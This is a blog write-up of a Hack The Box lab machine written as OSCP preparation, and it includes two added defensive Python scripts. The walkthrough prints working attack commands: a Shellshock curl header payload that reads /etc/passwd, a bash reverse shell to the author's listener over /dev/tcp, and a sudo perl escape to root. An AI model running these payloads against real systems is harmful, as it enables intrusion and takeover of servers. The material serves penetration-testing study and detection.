Path to OSCP: Shocker

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Shocker. We begin with nmap (shocker!):

u01@nostromo:~$ nmap -p- -A shocker.htb -oA HTB/shocker/shocker
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 10:17 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.03 seconds

We have an Apache webserver on port 80 and an OpenSSH server on non-standard port 2222, running on Ubuntu. Checking out the webpage we see the following:

Page source has no further leads, so we crack out gobuster to see what directories and files might be publicly accessible. While that’s running I check the versions of Apache and OpenSSH for any vulnerabilities. A couple of interesting results we’ll dig into further:

u01@nostromo:~$ searchsploit openssh 7.2
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------


u01@nostromo:~$ searchsploit apache 2.4.18
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
------------------------------------------------------------------------------------------------------------------------- ---------------------------------

I’m curious about the username enumeration on OpenSSH, since the version matches exactly, so I try “OpenSSH 7.2p2 – Username Enumeration | linux/remote/40136.py”. As is common with these older boxes though, I run into trouble with Python 2 scripts not running correctly under Python 3. I try specifying python2, running under a Python virtual environment, and using 2to3 to convert, but no luck. Running Python 2 scripts on modern Kali seems very hit and miss, despite having two solutions in the form of virtual environments and 2to3, so I’m hoping that in the actual OSCP (and as we encounter more recent boxes) Python 2.x exploits will become less common in favour of Python 3.

Anyway, I move on from the username enumeration for now. Gobuster has completed with no hits, which is a little unusual and suspect. I kick off gobuster again, this time including Status 403 for any forbidden files/directories, and this gives me a hit against two directories:

u01@nostromo:~/HTB/shocker$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 403,200 -b "" -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shocker.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 403,200
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

It goes without saying /cgi-bin/ is the more interesting of these two, as it potentially contains viewable scripts. I search for “cgi-bin exploit”, and come across old reliable HackTricks, with an article on CGI. It contains a short section on the Shellshock vulnerability. Given the box name of “Shocker”, it’s pretty obvious this is the right path. The article mentions an nmap script which can be used to test for the vulnerability. It requires a script file in the cgi-bin directory, so I’m very certain we’re on the right track now and just need to do some deeper enumeration to find an appropriate file. With that in mind, I kick off a gobuster scan against cgi-bin that includes common scripting extensions: .cgi, .pl, .py and .sh. We get a hit on user.sh:

u01@nostromo:~$ gobuster dir -u http://shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x cgi,pl,py,sh 
=============================================================== 
Gobuster v3.6 
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) 
=============================================================== 
[+] Url: http://shocker.htb/cgi-bin/ 
[+] Method: GET 
[+] Threads: 10 
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 
[+] Negative Status codes: 404 
[+] User Agent: gobuster/3.6 
[+] Extensions: cgi,pl,py,sh 
[+] Timeout: 10s 
=============================================================== 
Starting gobuster in directory enumeration mode 
=============================================================== 
/user.sh (Status: 200) [Size: 118]

We can then plug this into the nmap command:

u01@nostromo:~/HTB/shocker$ nmap shocker.htb -p 80 --script=http-shellshock --script-args uri=/cgi-bin/user.sh
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 12:58 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.027s latency).

PORT STATE SERVICE
80/tcp open http
| http-shellshock: 
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
| 
| Disclosure date: 2014-09-24
| References:
| http://seclists.org/oss-sec/2014/q3/685
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds


The box is indeed vulnerable to Shellshock. The GitHub repo opsxcq/exploit-CVE-2014-6271 (Shellshock exploit + vulnerable environment) has a nice single-line curl PoC, which we run to confirm remote command execution:

u01@nostromo:~/HTB/shocker$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://shocker.htb/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
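From the defender’s side, the request above leaves a very recognisable trace in the web server log. This is an added example, not code from the post or the exploit repo: a small Python detector run over constructed Apache combined-format access log lines (mirroring the curl request, with the same IPs and path) that flags requests whose User-Agent, Referer or request line carries the Shellshock function-definition signature.

```python
import re

# Apache "combined" log format: client ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock signature: a value that starts with a bash function definition "() {".
# A vulnerable bash importing that value from the environment runs whatever follows
# the closing brace. Matching only "() {" also catches the CVE-2014-7169 variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Request data a CGI handler exports into the environment (HTTP_USER_AGENT,
# HTTP_REFERER, and the request line / query string).
CHECKED_FIELDS = ("agent", "referer", "request")

def parse_combined(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def find_shellshock(log_text):
    """Return one finding per request whose exported fields carry a Shellshock payload."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_combined(line)
        if fields is None:
            continue
        for name in CHECKED_FIELDS:
            if SHELLSHOCK_RE.search(fields[name]):
                parts = fields["request"].split(" ")
                hits.append({"client": fields["client"], "field": name,
                             "path": parts[1] if len(parts) > 1 else parts[0],
                             "status": fields["status"]})
                break  # one finding per request is enough
    return hits

# Constructed sample: the curl PoC from above, a benign browser request, and a Referer-based attempt.
SAMPLE_LOG = """\
10.10.14.2 - - [15/Sep/2023:12:58:01 +0100] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.10.14.2 - - [15/Sep/2023:12:58:03 +0100] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.2 - - [15/Sep/2023:12:58:05 +0100] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; /bin/bash -c 'id'" "curl/8.3.0"
"""
```

Note that the benign request and the two payload requests all return 200 with the same size, so status codes alone give no signal; the header content is what to alert on.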

We modify this curl command to generate a bash reverse shell to a listening netcat:

u01@nostromo:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/7777 0>&1'" \
http://shocker.htb/cgi-bin/user.sh

And we get a shell as user shelly, allowing us to retrieve the user.txt flag from shelly’s home directory:

u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.56] 39216
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$

We check sudo permissions for shelly, and perl is executable as root with no password:

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$
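A rule like this is exactly what a hardening review should catch before an attacker does. As an added example (my own code, not from the post or from GTFOBins), here is a Python audit that parses sudo -l output like the above and flags rules granting root on interpreters or editors that can spawn a shell. The sample output is constructed to mirror the box’s, with one harmless rule added for contrast; the binary list is an assumption and only a small subset of what GTFOBins catalogues.

```python
import os
import re

# Binaries that can hand back a shell when run under sudo (a short sample of what
# GTFOBins catalogues); sudo rights on any of them are equivalent to root.
SHELL_ESCAPE_BINARIES = {"perl", "python", "python3", "ruby", "php", "node", "lua",
                         "bash", "sh", "vi", "vim", "nano", "less", "man", "awk",
                         "find", "env", "tar", "apt-get"}

# One rule line from 'sudo -l': "(runas) [TAG: ...] /path/cmd args, /path/cmd2"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$')

def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the rules section of 'sudo -l'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # lines above this are Defaults entries, not rules
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules

def audit_sudo_l(text):
    """Flag rules whose command is ALL or a known shell-escape binary."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = os.path.basename(cmd.split()[0])
        if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            findings.append({"runas": runas, "command": cmd, "binary": binary,
                             "nopasswd": "NOPASSWD" in tags})
    return findings

# Constructed sample mirroring the box's output, plus one harmless rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /bin/ls, /usr/bin/id
"""
```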

GTFOBins has a straightforward command to drop from perl into a root shell using this sudo privilege, and sure enough we’re in as root to obtain root.txt:

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";' 
sudo perl -e 'exec "/bin/sh";' 
id 
uid=0(root) gid=0(root) groups=0(root) 
ls -l /root/ 
total 4 
-r-------- 1 root root 33 Sep 15 05:11 root.txt

Takeaway for OSCP

My first impression of this box was one of frustration and it being a little too “CTF-like” for OSCP or real-life penetration testing. The initial enumeration for the user.sh file is very easy to miss, and it took me many attempts to even find the initial /cgi-bin/ as the correct attack vector. But after a bit of thought, I realise the initial enumeration was difficult only because of my lack of understanding of common Apache directories and their purpose. This was also a good box to remind me not to be lazy with directory fuzzing. It’s all too easy to just launch a default gobuster or ffuf scan without giving it a second thought. I feel the majority of the time for HTB this is sufficient, but in cases like Shocker it will lead you to miss a key clue towards exploitation. Not a box I enjoyed much, but some good lessons learnt.
